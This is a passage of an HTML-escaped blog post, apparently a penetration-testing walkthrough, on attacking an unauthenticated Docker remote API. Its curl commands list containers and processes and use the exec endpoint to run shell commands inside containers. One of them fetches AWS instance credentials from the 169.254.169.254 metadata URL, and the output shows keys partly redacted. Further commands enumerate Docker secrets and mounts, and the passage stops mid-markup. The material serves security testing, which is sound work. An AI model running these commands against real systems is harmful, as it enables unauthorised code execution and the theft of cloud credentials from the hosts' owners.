x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Id\": \"f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Names\": [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"\/docker_snip_1\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Image\": \"dotnetify\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"ImageID\": \"sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Command\": \"cmd \/S \/C 'dotnet netify-temp.dll'\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Created\": 1541018555,\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Ports\": [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"IP\": \"0.0.0.0\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"PrivatePort\": 443,\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"PublicPort\": 50278,\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E---SNIP---\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003EList processes in a container:\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure https:\/\/tls-opendocker.socker:2376\/containers\/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668\/top | jq\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;{\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Processes\": [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"smss.exe\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"7868\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"00:00:00.062\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"225.3kB\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"csrss.exe\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"10980\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"00:00:00.859\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"421.9kB\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"wininit.exe\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"10536\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"00:00:00.078\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"606.2kB\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"services.exe\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"10768\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"00:00:00.687\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"1.208MB\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"lsass.exe\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"10416\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"00:00:36.000\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"4.325MB\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;---SNIP---\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003ESet up and exec job to hit the metadata URL:\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/blissful_engelbart\/exec -d '{ \"AttachStdin\": false, \"AttachStdout\": true, \"AttachStderr\": true, \"Cmd\": [\"\/bin\/sh\", \"-c\", \"wget -qO- http:\/\/169.254.169.254\/latest\/meta-data\/identity-credentials\/ec2\/security-credentials\/ec2-instance\"]}'\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E{\"Id\":\"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55\"}\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EGet the output:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/exec\/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55\/start -d '{}'\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E{\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Code\" : \"Success\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"LastUpdated\" : \"2019-01-29T20:12:58Z\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Type\" : \"AWS-HMAC\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"AccessKeyId\" : \"ASIATRSNIP\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"SecretAccessKey\" : \"CD6\/h\/egYHmYUSNIPSNIPSNIPSNIPSNIP\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Token\" : \"FQoGZXIvYXdzEB4aDCQSM0rRV\/SNIPSNIPSNIP\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Expiration\" : \"2019-01-30T02:43:34Z\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E}\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;Docker secrets\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;relevant reading \u003Ca href=\"https:\/\/docs.docker.com\/engine\/swarm\/secrets\/\" target=\"_blank\"\u003Ehttps:\/\/docs.docker.com\/engine\/swarm\/secrets\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;\u003Cb\u003Elist secrets (no secrets\/swarm not set up)\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;curl -s --insecure https:\/\/tls-opendocker.socket:2376\/secrets | jq\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;{ \"message\": \"This node is not a swarm manager. Use \\\"docker swarm init\\\" or \\\"docker swarm join\\\" to connect this node to swarm and try again.\"}\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;list secrets (they exist)\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;$ curl -s --insecure https:\/\/tls-opendocker.socket:2376\/secrets | jq\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;[\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"ID\": \"9h3useaicj3tr465ejg2koud5\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Version\": {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"Index\": 21\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"CreatedAt\": \"2018-07-06T10:19:50.677702428Z\",\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"UpdatedAt\": \"2018-07-06T10:19:50.677702428Z\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Spec\": {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"Name\": \"registry-key.key\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"Labels\": {} }},\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003ECheck what is mounted\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439\/exec -d '{ \"AttachStdin\": false, \"AttachStdout\": true, \"AttachStderr\": true, \"Cmd\": [\"\/bin\/sh\", \"-c\", \"mount\"]}'\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;{\"Id\":\"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa\"}\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003EGet the output by starting the exec\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/exec\/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa\/start -d '{}'\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eoverlay on \/ type overlay\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eproc on \/proc type proc (rw,nosuid,nodev,noexec,relatime)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Etmpfs on \/dev type tmpfs (rw,nosuid,size=65536k,mode=755)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edevpts on \/dev\/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esysfs on \/sys type sysfs (ro,nosuid,nodev,noexec,relatime)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E---SNIP---\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Emqueue on \/dev\/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda2 on \/etc\/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda2 on \/etc\/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda2 on \/etc\/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eshm on \/dev\/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda2 on \/var\/lib\/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: 